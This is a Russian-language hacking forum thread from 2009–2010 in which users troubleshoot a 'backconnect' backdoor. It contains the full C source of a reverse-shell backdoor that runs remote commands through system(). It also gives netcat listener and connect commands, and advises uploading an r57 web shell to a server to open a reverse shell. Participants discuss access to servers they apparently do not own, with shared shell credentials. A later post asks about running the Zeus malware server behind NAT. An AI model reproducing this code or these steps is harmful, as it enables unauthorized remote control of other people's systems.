Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   *nix (https://forum.antichat.xyz/forumdisplay.php?f=43)
-   -   как произвести backconnect? (https://forum.antichat.xyz/showthread.php?t=116893)

krobol 20.04.2009 20:55
как произвести backconnect?
 
у меня не получается использовать backconnect backdoor:

беру сервер на котором с которым удаётся установить соединение через бэкдор - всё работает

отключаю у себя windows firewall, антивирус

запускаю: nc -l -p 13001

на сервере запускаю:
gcc bd.c -o bd
./bd my_ip 13001

свой ip узнаю на сайте cmyip.com, либо из коммандной строки: ipconfig

ниже код backconnect backdoor

Код:
/*
oooo...oooo.oooooooo8.ooooooooooo
.8888o..88.888........88..888..88
.88.888o88..888oooooo.....888....
.88...8888.........888....888....
o88o....88.o88oooo888....o888o...
*********************************
**** Network security team ******
********* nst.void.ru ***********
*********************************
* Title: nsT BackConnect Backdoor v1.0
* Date: 09.04.2006
* Usage:
*        client:        nc -lp 9999
*        server: ./backconnect <ip_client> 9999
*********************************
*/

#include <stdlib.h>
#include <stdio.h>
#include <error.h>
#include <string.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <resolv.h>

int main (int argc, char **argv) {
    struct sockaddr_in sock;
    int sd;
    char command[256];
   
    if (argc < 3) {
        printf("%s <host> <port>\n", argv[0]);
        return 1;
    }
   
    close(1);
   
    if ((sd = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
        perror(argv[0]);
        return 1;
    }
   
    bzero(&sock, sizeof(sock));
   
    sock.sin_family = AF_INET;
    sock.sin_port = htons(atoi(argv[2]));
    inet_aton(argv[1], &sock.sin_addr);
   
    if (connect(sd, (struct sockaddr *)&sock, sizeof(sock))) {
        perror(argv[0]);
        return 1;
    }
   
    close(2);
    dup(sd);
   
    bzero(command, 256);
    while (recv(sd, command, 255, 0) && strncmp(command, "quit", 4)) {
        system(command);
        bzero(command, 256);
    }
   
    close(sd);
    return 0;
}
... и соединения не происходит. В чём может быть проблема?

интернет через corbina, backconnect пробовал произвести на нескольких серверах - нигде не получилось.
Пробовал в одном окне: nc -l -p 1234, а в другом окне: nc my_ip 1234 - всё нормально работает.

SanyaX 20.04.2009 21:05
Держи другой бэкконект.
http://rapidshare.com/files/223658318/back.html
Скомпилированный.
Не когда не подводил, всегда проканывал.
use:./back your_ip
nc:nc -l -p 4000
Возможно соеденение не идёт из-за фаера на серваке.
Режет запросы.
Если что сорцы.
http://rapidshare.com/files/223659648/back.c.html

krobol 20.04.2009 22:19
не получилось. результат тот-же
Цитата:
Возможно соеденение не идёт из-за фаера на серваке.
как можно это обойти и совершить коннект?

Tigger 20.04.2009 22:29
1. Залей шелл r57. Потом открой NetCat и запусти с параметром -l -n -v -p 11457
Потом в самом низу шелла r57 есть менюшка бэкконект. В поле порт вбей 11457, а в поле IP свое IP. Нажми connect.

2. Если не получается, т.е. блочит фаер. В полне возможно, что он просто блочит порты все кроме 80. Т.е. открой у себя 80 порт и пробуй на него ;)

krobol 21.04.2009 07:53
1)
D:\nc>nc -l -n -v -p 80
listening on [any] 80 ...

2)
шелл r57 -> ::Сеть:: -> back connect:
IP: мой
порт: 80

не получилось.

пробую на этом сервере: <вырезано>

Подскажите, какие ещё варианты?

Tigger 21.04.2009 08:42
krobol, через r57 попробуй на другой порт. На тот, что я привел в примере. Попробуй сам открыть порт через этот шелл. Если получиться открыть порт, то на него делай бэкконект. А чтобы делать на 80, то надо его у себя открыть сначало ;)


ЗЫ: Зачем оставлять линк, если на шелле висит авторизация? о_0

krobol 21.04.2009 09:12
Цитата:
Сообщение от Tigger
ЗЫ: Зачем оставлять линк, если на шелле висит авторизация? о_0
авторизация: логин: 1, пароль: 1 - я указал в скобках

открывать порт через шелл и коннектится к нему у меня получается (если не здесь, то на других серверах точно получалось). А вот backconnect нигде не получается

Как открыть у себя 80 порт? Если: nc -l -n -v -p 80, то так я делал.

krobol 21.04.2009 12:50
на своём компе набрал
> ipconfig
ответ:

corbina - PPP адаптер:

DNS-суффикс этого подключения . . :
IP-адрес . . . . . . . . . . . . : 93.80.84.170
Маска подсети . . . . . . . . . . : 255.255.255.255
Основной шлюз . . . . . . . . . . : 93.80.84.170

отключил firewall, антивирус и набрал:
> nc -l -p 33333

затем, зашёл в unix-shell (/bin/bash) на сервер. Там оказался netcat, я набрал:
$ nc 93.80.84.170 33333

и ничего не проходит. Почему?

$ ping 93.80.84.170 работает

помогите, пожалуйста, разобраться

Tigger 21.04.2009 17:16
Чего-то ты тупишь =\
Я все сделал и никаких проблем нету =\
Сейчас видео сниму.


add:
Вот тут можешь скачать видео: http://webfile.ru/3431653

krobol 21.04.2009 17:20
сделал на том сервере, который я указал??

Tigger 21.04.2009 17:26
Я обновил свой последний пост.
Я сделал там, где ты шелл дал =\

krobol 21.04.2009 17:41
http://webfile.ru не грузится

можешь скинуть на другой обменник?

Tigger 21.04.2009 17:44
Я с тебя в шоке...
То ты спрашиваю, где я сделал, то блин файлообменники у него не грузятся... =\
На: http://rapidshare.com/files/223996083/netcat.rar.html

krobol 21.04.2009 18:00
всё сделал как в видео, но у меня в netcat ничего не выдаёт, никаких ответов сервера !?!?!? почему??

после нажатия "выполнить" в шелле - в netcat ничего не происходит

Tigger 21.04.2009 18:06
Может у тебя неткат кривой?
Значит скачай мой: http://rapidshare.com/files/224003205/nc.rar.html
Потом запускай не через cmd, а исходник из папки запусти. Потом вбей в нем -l -n -v -p 3373
Потом в шелле тоже на порт 3373. Если же нет, то тогда хз что =(

krobol 21.04.2009 18:26
сделал как ты написал:

скачал твой netcat
запустил из папки
вбил -l -n -v -p 3373
в шелле тоже этот порт 3373

не получается :(

пробовал с дедика, тоже не идёт, но с дедика в шелле пишет фразу: now script try connect to xxx.xxx.xxx.xxx port 3373 ...
на мой комп даже этого не писало.

у меня инет по сетевому проводу через корбину - может в этом дело? как это можно обойти?

на дедике возможно дело в антивирусе (я не знаю как его отключать)

krobol 22.04.2009 17:24
у меня есть root доступ на сервер с Linux

как можно сделать на него backconnect с веб-шелла?

nc присутствует, но как в windows
$ nc -l
не работает.
Как на unix запускается nc? или какая другая программа на прослушку порта для backconnct?
________________________
всё получилось!

отдельное спасибо Tigger!


на удалённом unix сервере nc какой-то кривой стоит.

взял архив http://www.sfr-fresh.com/unix/misc/nc110.tgz
и собрал (make linux).

Со сборкой тоже пришлось помучиться. Выдавало ошибку в netcat.c - функция res_init() не определена.
Решил удалением части кода из netcat.c:

Код:
#ifdef HAVE_BIND
/* can *you* say "cc -yaddayadda netcat.c -lresolv -l44bsd" on SunLOSs? */
  res_init();
#endif
Всё заработало как в видео Tigger.


Если кто-то знает как обойти "сидение под натом" расскажите, пожалуйста.

zerotof 20.08.2009 15:02
Цитата:
Сообщение от Tigger
Чего-то ты тупишь =\
Я все сделал и никаких проблем нету =\
Сейчас видео сниму.


add:
Вот тут можешь скачать видео: http://webfile.ru/3431653
Видео удалили. Можешь перезалить?

Doomer1234 16.03.2010 12:54
Уважаемые Гуру!
сорри что снова поднял эту тему!
меня интересует так же тема backconnecta

подскажите как можно организовать BC за натом ! сервер чтобы linux был

организовывал bc на зевсе там сервак на win что очень не приемлемо! да глючит вся эта связка вместе!

что можете предложить какие нить shell или еще что либо! - это для сервера
а клиент который за NAT - ??? так же может исходники есть чтобы был прозрачен для firewall черз 80 порт

или возможно переделать сервер зевса на linux? кто с этим сталкивался

(Dm) 16.03.2010 21:44
Цитата:
*********************************
* Title: nsT BackConnect Backdoor v1.0
* Date: 09.04.2006
Елки =) моя хрень. старая-старая.
PS сор оффтоп


Время: 09:03